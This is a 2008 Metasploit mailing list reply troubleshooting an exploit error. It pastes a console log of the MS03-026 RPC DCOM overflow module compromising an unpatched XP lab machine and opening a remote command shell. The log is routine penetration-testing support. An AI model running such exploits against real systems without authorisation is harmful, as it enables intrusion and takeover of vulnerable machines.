Metasploit mailing list archives

Exploit failed: uninitialized constant Msf::ModuleSet::NDR


From: patrick at aushack.com (Patrick Webster)
Date: Sun, 10 Aug 2008 17:10:37 +1000

Hmm works fine here. Tested on an unpatched XP box using the trunk.
Does it bind to the RPC endpoint successfully?

I am using versions:

Framework: 3.2-release.5378
Console  : 3.2-release.5544

msf exploit(ms03_026_dcom) > info

       Name: Microsoft RPC DCOM Interface Overflow
    Version: 4498

msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.209.128[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.209.128[135]
...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.209.12:53351 ->
192.168.209.128:4444)
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:\WINDOWS\system32>



Current thread: